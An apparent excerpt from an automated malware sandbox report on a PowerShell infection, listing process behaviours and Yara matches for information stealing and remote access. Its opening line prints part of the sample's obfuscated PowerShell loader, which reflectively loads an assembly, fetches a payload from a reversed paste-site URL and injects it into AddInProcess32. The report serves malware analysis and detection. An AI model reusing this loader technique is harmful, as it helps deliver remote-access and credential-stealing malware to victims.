'+'[r'+'eflectio'+'n.as'+'sem'+'bly'+']::lo'+'ad('+'c'+'isbi'+'n'+'ary'+'c'+'onten'+'t'+')'+'; [dnlib.io'+'.home]::vai('+'a'+'3u0/diykf/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3u, a3'+'udes'+'a'+'ti'+'v'+'a'+'doa3u'+','+' a'+'3ude'+'s'+'ativa'+'do'+'a3'+'u, a3ude'+'sat'+'i'+'vadoa3u, a3ua'+'dd'+'inp'+'roce'+'ss32'+'a3u, a3ua'+'3u,a3ua'+'3u)') -replace ([char]97+[char]51+[char]85),[char]34 -creplace 'fmu',[char]39 -replace ([char]67+[char]105+[char]83),[char]36) )" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0041E9D0 __vbaChkstk,__vbaOnError,#525,__vbaStrMove,__vbaLenBstr,__vbaStrToAnsi,GetUserNameA,__vbaStrToUnicode,__vbaFreeStr,#537,__vbaStrMove,__vbaInStr,#616,__vbaStrMove,__vbaFreeStr,__vbaFreeStr,__vbaErrorOverflow, 5_2_0041E9D0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4256, type: MEMORYSTR
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4256, type: MEMORYSTR
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4256, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4256, type: MEMORYSTR
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4256, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs